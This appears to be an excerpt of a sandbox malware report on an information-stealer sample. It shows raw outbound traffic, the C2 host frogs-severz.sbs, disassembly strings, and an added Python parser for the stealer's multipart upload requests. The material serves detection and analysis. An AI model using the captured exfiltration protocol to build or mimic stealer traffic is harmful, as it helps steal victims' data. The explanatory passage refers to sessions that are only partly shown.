                                                                      2024-11-25 07:44:33 UTC | 15331 | OUT | Data Raw: ba 02 c8 64 31 06 2a bd 00 b3 12 0d e0 b9 33 a0 d0 0c e4 fe 8e da 01 e3 25 d8 46 0a 75 23 28 14 95 43 7a f9 3f 38 f8 e9 3e 6e 2e 60 36 42 a0 5a a9 10 c9 03 ce 46 03 b8 ba 02 34 c9 20 11 fb 11 34 d5 1f d5 08 3b 55 f6 c0 5b 28 c6 ef 23 5c b3 9d 9a 79 a5 d0 31 32 2b a5 cc 56 14 55 22 32 17 80 c7 c8 9c 5b d3 be d0 4f c7 c0 5a bb e5 3c d6 76 01 cf 2e 09 7e 7c 6e 5b 01 44 c5 59 ed f9 8a f4 80 1f f2 dd 57 07 fe bc 7d 44 19 73 a6 1b 97 6d d6 96 b3 63 19 61 29 7e dc 85 60 47 df af 26 c6 89 98 a5 f0 9b 0c c3 0c 76 ce 1d 24 cf 2b 3e 45 03 26 79 bb 42 0f 0a 20 e9 7d 0a 6c a9 48 ca 26 b7 f8 74 f8 a2 a8 19 bc 52 f9 bb 6a 8e b3 33 bd b6 7f 4d 53 2a f0 33 0a 19 eb e7 77 7b ad 94 5a 50 ea 0d e4 74 f7 a4 78 54 a4 ce 5b 75 7d b0 75 24 3e c9 b6 e4 33 05 eb d6 82 f5 26 c2 15
                                                                      Data Ascii: d1*3%Fu#(Cz?8>n.`6BZF4 4;U[(#\y12+VU"2[OZ<v.~|n[DYW}Dsmca)~`G&v$+>E&yB }lH&tRj3MS*3w{ZPtxT[u}u$>3&
                                                                      2024-11-25 07:44:33 UTC | 15331 | OUT | Data Raw: 41 93 fb de de bb 49 72 91 ed 6c 07 79 a6 3d 3f 57 98 20 b2 31 6c 9e 92 bb 84 d1 1c 3b fe 2e bb 46 88 b5 e9 e9 b5 25 ff 59 a9 4e 67 b7 be ea 22 39 05 e1 bc 55 7e 98 eb 2a 3c 18 71 b0 7f f3 83 91 0e af f0 0a 76 fc 51 0d 6b bf d3 06 44 8e 1f 57 4d b2 ce 7a df 74 0b 40 5e ff 48 4e ed 45 29 e2 3b b4 68 fe d8 fb 1f a3 d5 b5 d5 7a 22 22 ac 8b e7 85 42 af 14 4b 20 f4 02 cd 70 66 0f bc d0 a7 ea ba 76 5d 8c 48 4c 11 22 b7 b6 6c 9d 4e cd be 1f e9 fe 19 97 11 ad e7 61 35 d7 f4 f3 fd 64 99 52 cc e9 f3 24 b7 25 f5 8d 2f 6e 9e 62 d6 2c 42 e3 9f 86 41 a4 39 f4 99 9d dd ed 9d 34 71 16 77 61 49 1a da ed f9 d4 37 39 b1 ea 81 ec b5 1a 5c 30 d1 98 ec cc 4c 90 97 c4 31 e3 3c a6 21 62 0c 1e e3 2a 50 d7 bb f9 25 34 5d da dc 8c 06 c3 ba a3 c5 82 d4 fa ca 80 f9 e4 5d 8a 04 76 09
                                                                      Data Ascii: AIrly=?W 1l;.F%YNg"9U~*<qvQkDWMzt@^HNE);hz""BK pfv]HL"lNa5dR$%/nb,BA94qwaI79\0L1<!b*P%4]]v
                                                                      2024-11-25 07:44:33 UTC | 15331 | OUT | Data Raw: c3 4e ae 5d 84 fd a5 07 d6 d6 3e 82 94 46 f8 fa 20 6c 88 f6 59 99 7f 6b 83 0e 70 ac 74 fa bd 3f 7b a5 06 40 a5 96 de ce b3 19 c7 5d fc f1 d7 21 26 09 be ab 8f 1a 01 a0 31 80 d5 ae 62 93 7d 47 46 7e 0a d8 0c 38 f8 84 5c 87 d2 37 9d a4 54 04 45 5b 1d 97 0e bf ea 51 b0 1c 49 7b 78 d7 7d 90 3e 36 49 4d 95 af 77 93 5e f8 01 d1 14 b1 a1 8f e6 47 67 80 cf 40 e7 1d 81 f6 ff 57 16 5b 93 fe f7 27 47 26 c8 27 71 45 c1 28 99 86 5d f5 18 4e a7 a7 00 9b 11 ec e9 1f 02 29 bc 20 2b d7 38 8a 71 0a 90 66 f3 7c 38 8d a6 67 62 a2 e1 8f b3 b1 67 c2 14 80 04 8a 71 4a c8 55 05 a9 9c 25 b7 8e 72 ec 8a 7a 10 19 2a 06 ce ba a5 63 61 b5 b0 1b 52 2b bf dd 50 d4 a8 60 31 d4 ad 9a d3 b4 38 94 03 48 7e eb d6 48 61 1a 3a 42 18 51 e2 b8 f1 00 b2 27 a1 5e 4e d0 af b4 b9 69 3e 36 34 fb 7a
                                                                      Data Ascii: N]>F lYkpt?{@]!&1b}GF~8\7TE[QI{x}>6IMw^Gg@W['G&'qE(]N) +8qf|8gbgqJU%rz*caR+P`18H~Ha:BQ'^Ni>64z
                                                                      2024-11-25 07:44:33 UTC | 15331 | OUT | Data Raw: e8 25 7a d6 25 c7 f8 83 95 3d d7 3a 20 a4 dc ea 01 a0 5b aa 9d 04 1d 2a 24 cf d3 35 b7 78 e1 e6 62 9e bc 86 f6 13 e9 23 fd d6 4d c5 a7 65 17 35 9b 4b d1 ef e2 37 1b 03 3a 55 55 17 d0 79 7d a9 ce 2e df 0e ee 66 15 dd 08 fd 99 1d a8 76 52 16 7a ba 9f aa fb 64 8b f9 76 b0 a7 ad 5e be f9 3f 7d aa c8 74 05 88 aa 84 03 66 7f c9 9b 59 4e 19 ce 10 2d 8f ea 33 ae 72 68 89 08 ce 93 13 e1 bc c3 83 28 38 4e 83 dd b5 07 87 42 78 c9 8f 4f 4a 17 8a 0f 9b 9c 7b df bf 1d 1c bc 6d f1 08 e7 bf f1 e0 41 f8 e2 20 88 7d 00 df 88 76 e1 c1 f8 1d ab b4 92 8f 33 65 3a b7 aa 80 93 24 09 95 79 32 50 4d f9 0e 91 4d d2 a2 b6 0e 22 3a 8b a8 40 8f 3e b2 14 e4 37 7f 13 34 73 3b 5a 36 6d 30 25 57 70 b4 7a a1 2c 8f bb 4d 41 cd 87 42 c6 66 91 5a 31 2a 64 f9 11 0a 53 a3 d3 73 93 b8 48 00 03
                                                                      Data Ascii: %z%=: [*$5xb#Me5K7:UUy}.fvRzdv^?}tfYN-3rh(8NBxOJ{mA }v3e:$y2PMM":@>74s;Z6m0%Wpz,MABfZ1*dSsH
                                                                      2024-11-25 07:44:33 UTC | 15331 | OUT | Data Raw: 3a 17 a5 3f 1e dd e1 53 1f f6 9b e7 fc 55 28 41 11 ae 4c ea 9c 5c cc 68 d2 57 49 4c 4f 7c fb f9 2c ab 72 05 80 e3 9a 55 97 06 6c 20 42 6a 30 12 d9 e7 be 68 b9 6d ce f5 99 df c2 a3 60 9d 7e bf 82 04 50 b1 f6 ef 83 af 8c 1b 4d 69 3b 77 33 ae bd 8d 66 d0 39 10 67 aa ab e8 3b c4 94 6e ef 4b dc 6f 1c b0 60 3f 44 4e 1b f7 a5 1c 7d ec 52 aa 72 d9 b9 fc c0 93 b5 80 a9 96 47 0b de aa b3 79 52 a0 f8 aa ee c9 37 1d 41 8c 4f 9c dd 02 28 ed 8a 95 1b 9c 95 fc cc e6 be a0 fd 28 2a 3b e0 80 dd ac 20 a5 ec 7f 63 5a 0f 02 7b dc 06 61 c8 74 36 01 e4 f3 92 d4 b5 8e 0f b0 fb c2 4d 80 09 4c 01 54 51 57 9a 08 c1 19 ea f8 a0 d2 22 5a c6 cf d7 e3 44 e7 3f bd 25 90 5c fe 6f cc 41 bc 93 cb ca 46 48 18 ab 84 58 ad f2 c6 c7 cf 62 ce b9 41 8d a2 20 e7 0e e8 fe ec ac c8 d4 e6 78 1c f0
                                                                      Data Ascii: :?SU(AL\hWILO|,rUl Bj0hm`~PMi;w3f9g;nKo`?DN}RrGyR7AO((*; cZ{at6MLTQW"ZD?%\oAFHXbA x
                                                                      2024-11-25 07:44:33 UTC | 15331 | OUT | Data Raw: 9d 0c 55 ac 82 08 22 ca e3 56 1e fe 80 86 62 a9 c8 5a 8d a7 4e ff 3c 54 af e5 c7 16 5a 46 aa 58 ff 95 3d 98 1d 1d 8a ab 05 23 7e 2e cf ab 00 6c 68 37 07 34 4e b1 33 ee b9 88 56 ca 61 57 e4 6b dc e2 04 06 a5 7a c2 2e ed 92 ef 65 20 df 33 0f b5 41 e0 8a 55 be d7 f2 cb ea 26 b1 28 96 e4 31 04 e6 b1 cf f8 8d 74 16 3b 1b 16 7c 69 af 8d f4 3f 4d 4e 97 eb 09 2b 11 63 3a 87 e6 01 9b 0a d9 8a a4 e4 99 a4 c7 dd 99 36 4d b5 37 bc 5e d8 f1 9a e4 f8 92 34 05 d5 29 6a 40 01 33 34 93 de 48 e9 66 22 01 a2 5d e2 fb 29 92 fb 08 7a dc 93 ca 0b be 0f a3 8b d1 51 83 78 e0 56 72 02 ce eb fe 18 73 fe 9a 90 b3 9e 9e 32 fa da f9 5e 69 8d 07 9c 46 bd fa 58 6a 3e 46 1f 37 ab c3 33 2e d6 13 97 b4 4b 6a 6b 7c c8 58 e7 23 14 d8 2d 85 ba 3e bf e0 f0 5a 10 64 ca 01 01 c7 2e 3d cc d6 79
                                                                      Data Ascii: U"VbZN<TZFX=#~.lh74N3VaWkz.e 3AU&(1t;|i?MN+c:6M7^4)j@34Hf"])zQxVrs2^iFXj>F73.Kjk|X#->Zd.=y
                                                                      2024-11-25 07:44:33 UTC | 15331 | OUT | Data Raw: 65 7c cf 86 79 08 27 4e da ce 15 fa ea da bb a9 e5 c1 9b 2b ff d4 6b 89 82 2d 6e b8 34 4d dc cf c7 20 4d 2a e4 e0 5e 4c d1 06 d2 85 d4 2c 97 80 6c 5b c3 33 4e e1 5d 19 bf a0 aa 07 e8 3c 24 c8 1c 97 7b 4f cd 1b 35 10 c3 76 b8 1b 8d b7 58 c2 6f 0d 23 43 ce 5d a9 f2 aa c4 00 51 c6 4a 3f 69 f5 03 1d c9 ca d4 d1 b0 97 c9 55 c5 f3 06 04 08 e1 5e e6 4c 7d a2 ad 42 08 1c 12 cb df ce ad b9 81 09 9b dc 6f 71 d0 2c 46 2a 92 34 d6 f6 b7 4e 9f ae 41 32 9b d7 8b 13 a8 93 f1 32 45 c7 37 53 7e e3 b2 5f 92 e5 fe 5e c1 42 92 f3 a7 38 a9 61 54 14 35 e5 b5 52 42 13 ef f6 1c 6f 76 29 77 ff 60 05 26 14 04 8b b1 37 3d ab 2a 89 13 bf 67 bb f1 5a 76 f4 99 ba 6e 67 00 ff da 7a d0 ba fe 5f 12 ca 4c 13 ca bf 53 31 36 f0 5d 46 db 9d 27 36 d5 9f b2 4f 25 1d fc 29 2a 3d 73 8a 70 1e 7b
                                                                      Data Ascii: e|y'N+k-n4M M*^L,l[3N]<${O5vXo#C]QJ?iU^L}Boq,F*4NA22E7S~_^B8aT5RBov)w`&7=*gZvngz_LS16]F'6O%)*=sp{
                                                                      2024-11-25 07:44:33 UTC | 15331 | OUT | Data Raw: 6b 93 76 89 9c 3b 3e 64 52 b6 ad 00 22 44 9d ef ef fe 6c 45 ce 14 eb 1f 15 05 93 21 df 97 e7 1c b2 e4 41 66 da d5 b2 f3 d0 a2 20 c0 ff ca b4 43 c0 16 59 e1 2a 48 7c 42 4c 3c 8a c0 dd 21 c2 7b 91 aa fc 49 bd ab e4 57 a7 25 23 1e 40 d4 13 3f 93 2a 8f 77 eb 61 c1 a4 73 d2 42 46 13 42 99 48 39 95 2c ae 91 9a 3a a6 4a ae 99 24 31 76 2a 27 da 04 82 63 a1 e8 d5 91 a5 40 b2 21 90 04 b5 85 34 f4 d2 44 41 6d b8 c5 5e 7b 55 e6 b9 1d ae 59 d5 65 54 d8 b8 71 d1 68 99 67 2e 66 1d c3 1f f2 72 f1 9d fd 79 92 36 35 de 4d 51 37 09 77 47 9c a5 ae e5 41 19 c2 08 7e c6 3d 6a 37 71 05 cc 22 1f c1 4a 54 8d 63 95 f0 92 08 36 ba bf 67 a6 78 ac 2f 52 02 9c 6c ed 7d 6a 04 b2 ac ce b3 88 77 29 99 a8 c4 a1 54 31 a1 f3 bb 12 01 5d 3f 3a 34 f6 ef 23 88 e9 b7 ea 33 75 47 e1 83 29 a0 3a
                                                                      Data Ascii: kv;>dR"DlE!Af CY*H|BL<!{IW%#@?*wasBFBH9,:J$1v*'c@!4DAm^{UYeTqhg.fry65MQ7wGA~=j7q"JTc6gx/Rl}jw)T1]?:4#3uG):
                                                                      2024-11-25 07:44:36 UTC | 1019 | IN | HTTP/1.1 200 OK
                                                                      Date: Mon, 25 Nov 2024 07:44:36 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=99m6i9qn4irdr25e9sm64va1ss; expires=Fri, 21-Mar-2025 01:31:14 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jzIkb7KGyS%2FNH%2FmcOccoitPRK0InPll%2FG3XPT80tMJ6nFFF4Dd0sQD%2FEtMCOaexE5wx6ypPu7bl2D3U5euhG4RKe8f4l2N1rAnaWWkuZh0cD1m%2BstHKlHGUscrfEHOdB5dCB"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e8003a08dc27d11-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1971&sent=337&recv=567&lost=0&retrans=0&sent_bytes=2839&recv_bytes=553770&delivery_rate=1462925&cwnd=241&unsent_bytes=0&cid=75a49a0e52e037f6&ts=3665&x=0"
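The three sessions above are the same exchange repeated: a multipart POST to /api on frogs-severz.sbs carrying hwid, pid and lid text fields followed by a large opaque part, answered by a chunked body that decodes to ok 8.46.123.75. The Python below is an added worked example for this page, not code from the sample or from Joe Sandbox. It parses such a request, extracts the form fields, lists which traits of the captured traffic shape a request matches, and reassembles the chunked reply. The request it runs on is constructed to mirror session 5 (boundary, field names and values as captured); the part named file, its filename and its contents are assumptions, because the capture is cut off after Content-Di, and the indicator list is derived only from what this report shows, not from a published protocol description.

```python
# Added example for this report page (not code from the sample or from Joe Sandbox).
import re
from typing import Dict, List, Tuple

BOUNDARY = b"03GZDEUN"  # boundary used in session 5


def _text_part(name: bytes, value: bytes) -> bytes:
    return b'--%s\r\nContent-Disposition: form-data; name="%s"\r\n\r\n%s\r\n' % (BOUNDARY, name, value)


# CONSTRUCTED to mirror session 5: the three text fields are as captured; the binary
# part (its name "file", filename and contents) is a hypothetical stand-in for the
# part the capture truncates.
SAMPLE_BODY = (
    _text_part(b"hwid", b"E0081D6A60C8C436D7CBBD6DF28D3732")
    + _text_part(b"pid", b"1")
    + _text_part(b"lid", b"LOGS11--LiveTraffic")
    + b'--%s\r\nContent-Disposition: form-data; name="file"; filename="file"\r\n'
      b"Content-Type: application/octet-stream\r\n\r\n\x83\xdf\xda\xd9PLACEHOLDER\x00\x01\r\n" % BOUNDARY
    + b"--%s--\r\n" % BOUNDARY
)
SAMPLE_REQUEST = (
    b"POST /api HTTP/1.1\r\nConnection: Keep-Alive\r\n"
    b"Content-Type: multipart/form-data; boundary=%s\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36\r\n"
    b"Content-Length: %d\r\nHost: frogs-severz.sbs\r\n\r\n" % (BOUNDARY, len(SAMPLE_BODY))
) + SAMPLE_BODY
# Chunked reply body exactly as captured in sessions 4 and 5: chunk "e", then the terminating "0".
SAMPLE_RESPONSE_BODY = bytes.fromhex("65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a 30 0d 0a 0d 0a")


def parse_http_request(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split a raw HTTP/1.1 request into (request line, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return lines[0].decode("latin-1"), headers, body


def parse_multipart(body: bytes, content_type: str) -> List[Dict[str, object]]:
    """Return the parts of a multipart/form-data body using RFC 7578 framing."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        return []
    delimiter = b"--" + m.group(1).encode("latin-1")
    parts = []
    for segment in body.split(delimiter)[1:]:
        if segment.startswith(b"--"):
            break  # closing delimiter "--boundary--"
        head, _, data = segment[2:].partition(b"\r\n\r\n")  # [2:] drops the CRLF after the delimiter
        data = data[:-2] if data.endswith(b"\r\n") else data  # CRLF that precedes the next delimiter
        disposition = {}
        for hline in head.split(b"\r\n"):
            hname, _, hvalue = hline.partition(b":")
            if hname.strip().lower() == b"content-disposition":
                for k, v in re.findall(rb'(\w+)="([^"]*)"', hvalue):
                    disposition[k.decode("latin-1")] = v.decode("latin-1")
        parts.append({"name": disposition.get("name"), "filename": disposition.get("filename"), "body": data})
    return parts


def lumma_indicators(request_line: str, headers: Dict[str, str], fields: Dict[str, bytes]) -> List[str]:
    """Shape checks derived only from the three sessions in this report, not from a protocol spec."""
    hits = []
    method, _, rest = request_line.partition(" ")
    if method == "POST" and rest.split(" ", 1)[0] == "/api":
        hits.append("POST to /api")
    if headers.get("content-type", "").startswith("multipart/form-data"):
        hits.append("multipart/form-data body")
    if {"hwid", "pid", "lid"} <= set(fields):
        hits.append("form fields hwid, pid and lid present")
    if re.fullmatch(rb"[0-9A-F]{32}", fields.get("hwid", b"")):
        hits.append("hwid is a 32-hex-digit identifier")
    if b"--" in fields.get("lid", b""):
        hits.append("lid has the X--Y shape seen in the capture")
    return hits


def decode_chunked(data: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked body: hex-size CRLF data CRLF ... 0 CRLF CRLF."""
    out, pos = bytearray(), 0
    while True:
        eol = data.index(b"\r\n", pos)
        size = int(data[pos:eol].split(b";")[0], 16)  # ignore any chunk extension
        pos = eol + 2
        if size == 0:
            return bytes(out)
        out += data[pos:pos + size]
        pos += size + 2


def analyze(raw_request: bytes, raw_response_body: bytes) -> Dict[str, object]:
    """Summarise one exchange: host, text fields, bytes in file parts, indicators, decoded reply."""
    request_line, headers, body = parse_http_request(raw_request)
    parts = parse_multipart(body, headers.get("content-type", ""))
    fields = {p["name"]: p["body"] for p in parts if p["filename"] is None}
    return {
        "host": headers.get("host"),
        "fields": fields,
        "uploaded_bytes": sum(len(p["body"]) for p in parts if p["filename"] is not None),
        "indicators": lumma_indicators(request_line, headers, fields),
        "server_reply": decode_chunked(raw_response_body),
    }


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_REQUEST, SAMPLE_RESPONSE_BODY).items():
        print(f"{key}: {value!r}")
```

All three sessions go to 104.21.88.250:443, so the request bytes are only available after TLS termination (the sandbox's own decryption, or an intercepting proxy in a lab); feed the reassembled application-layer stream to analyze(). The indicators are deliberately loose and should be combined with the Suricata alerts and the C2 host from the extracted configuration before being treated as a detection on their own.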



                                                                      Target ID:0
                                                                      Start time:02:44:13
                                                                      Start date:25/11/2024
                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                      Imagebase:0x3a0000
                                                                      File size:1'844'224 bytes
                                                                      MD5 hash:5032EEA68452FF054956ADD942D03697
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true


                                                                        Execution Graph

                                                                        Execution Coverage:11.1%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:68.4%
                                                                        Total number of Nodes:231
                                                                        Total number of Limit Nodes:15
                                                                        [Execution graph node and edge data omitted. API calls labelled on graph nodes: CoInitializeEx, CoInitializeSecurity, CoSetProxyBlanket, CoUninitialize, ExitProcess, FreeLibrary, GetVolumeInformationW, LdrInitializeThunk, RtlAllocateHeap, RtlReAllocateHeap, SysAllocString, SysFreeString.]

                                                                        Control-flow Graph (function 3c3d70)
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID: $!@$,$9$:$;$`$`$`$e$e$e$f$f$f$g$g$g$n
                                                                        • API String ID: 1279760036-1524723224
                                                                        • Opcode ID: 50db994c031c359ed39863e1208a4b2270142f2bda9caaefda92f57c440adac0
                                                                        • Instruction ID: be7d25dd2040c3e420fffc12ad8d395eeaa14eb16364642b063388910fcf257e
                                                                        • Opcode Fuzzy Hash: 50db994c031c359ed39863e1208a4b2270142f2bda9caaefda92f57c440adac0
                                                                        • Instruction Fuzzy Hash: F822AE7550C3808FD3268F28C4A4BAEBBE1AB95314F19892DE5D5CB392D3768C45CB53

                                                                        Control-flow Graph (function 3d9030)
                                                                        APIs
                                                                        • SysAllocString.OLEAUT32(13C511C2), ref: 003D91B7
                                                                        • CoSetProxyBlanket.COMBASE(0000FDFC,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 003D91FD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: AllocBlanketProxyString
                                                                        • String ID: =3$C$E!q#$E!q#$Lgfe$\$IK
                                                                        • API String ID: 900851650-4011188741
                                                                        • Opcode ID: 06b1b71e5c359e97021c93a7076041fb7de408fe8c6d17bc9114fed43966cce8
                                                                        • Instruction ID: 8f85be92660121904cba609153c47764eeba3c31dda490a77d6a9fc20feae01c
                                                                        • Opcode Fuzzy Hash: 06b1b71e5c359e97021c93a7076041fb7de408fe8c6d17bc9114fed43966cce8
                                                                        • Instruction Fuzzy Hash: FA2254B29083009FD725CF20D881B6BBBAAEF95314F158A1EF4959B3C1D774E905CB92

                                                                        Control-flow Graph (function 3acf05)
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ()$+S7U$,_"Q$0C%E$7W"i$;[*]$<KuM$E0081D6A60C8C436D7CBBD6DF28D3732$N3F5$S7HI$frogs-severz.sbs$y?O1$c]e$gy
                                                                        • API String ID: 0-4089135330
                                                                        • Opcode ID: d71b09f4518dc16af3e877ec97564f2a4054b59143cd864e0bc77046e0abc95d
                                                                        • Instruction ID: e636b20c3bed400b1ebcb3f03910b1a650776c9458d0ed413cb64153fa224433
                                                                        • Opcode Fuzzy Hash: d71b09f4518dc16af3e877ec97564f2a4054b59143cd864e0bc77046e0abc95d
                                                                        • Instruction Fuzzy Hash: FE12FBB15883D18ED3368F25C495BEFBBE1EBD2304F19896CC4DA5B252C775090ACB92

                                                                        Control-flow Graph (function 3a98f0)
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: DG$E0081D6A60C8C436D7CBBD6DF28D3732$Ohs,$chs,$fhnf$fhnf$xy$su${}
                                                                        • API String ID: 0-2816888744
                                                                        • Opcode ID: 4bcc5d6164e05956d15447e1a4f180f354fe2a09878f954d04205d2edf7a1ef5
                                                                        • Instruction ID: 2468a6fff21c61abad93bc764b2fbd6c22efa28850c3b1bf1248acb43b5b401f
                                                                        • Opcode Fuzzy Hash: 4bcc5d6164e05956d15447e1a4f180f354fe2a09878f954d04205d2edf7a1ef5
                                                                        • Instruction Fuzzy Hash: FCE15B72A483504BD329CF35C8517ABBBE6EBD2314F198A2DE5E59B391D734C805CB42

                                                                        Control-flow Graph (function 3ae35b)
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Uninitialize
                                                                        • String ID: Lk$U\$Zb$frogs-severz.sbs$r
                                                                        • API String ID: 3861434553-2060998389
                                                                        • Opcode ID: 79dd65b385700aefae72e21a07e59c64979ccd5d6c2e3a4b11c1e9f11d2dd524
                                                                        • Instruction ID: b7d0370918cbaa310166a3a6d4792d68d05654a1b59b1dd66e7c6eac2c3d05fd
                                                                        • Opcode Fuzzy Hash: 79dd65b385700aefae72e21a07e59c64979ccd5d6c2e3a4b11c1e9f11d2dd524
                                                                        • Instruction Fuzzy Hash: 12A1AE7050C3D18AD7768F25D4A47EFBBE1EB93308F188A5CD0E94B292DB3985058B57

                                                                        Control-flow Graph (function 3a89a0)
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(00000000), ref: 003A8CB5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1601847960.00000000003A0000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601869530.00000000003E5000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601915574.00000000003F7000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.00000000003F9000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000582000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.0000000000683000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.000000000068C000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1601932848.000000000069A000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602263729.000000000069B000.00000080.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602374245.0000000000833000.00000040.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1602391793.0000000000834000.00000080.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: 7b92827063fbc013c622b22fc42ca49f80565c8bb8e1d5b92bebb9f85582e452
                                                                        • Instruction ID: b494dc896e836a4a69d1f4b9843935acb77ecfaed7b304c8d267b604ef148883
                                                                        • Opcode Fuzzy Hash: 7b92827063fbc013c622b22fc42ca49f80565c8bb8e1d5b92bebb9f85582e452
                                                                        • Instruction Fuzzy Hash: 9771E473B547044BC708DEBADC9235BF6D6ABC8714F0AD83D6888DB391EA789C054685

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1601869530.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: =:;8
                                                                        • API String ID: 2994545307-508151936
                                                                        • Opcode ID: 78e92ab8e117e3e1e28fb014070ee5b924627b85fd490b072f60f57e8e96ac50
                                                                        • Instruction ID: b676d9e286008244f657411d2416a8b37a2a57bdd88b9db4ae65c1b1df960f4a
                                                                        • Opcode Fuzzy Hash: 78e92ab8e117e3e1e28fb014070ee5b924627b85fd490b072f60f57e8e96ac50
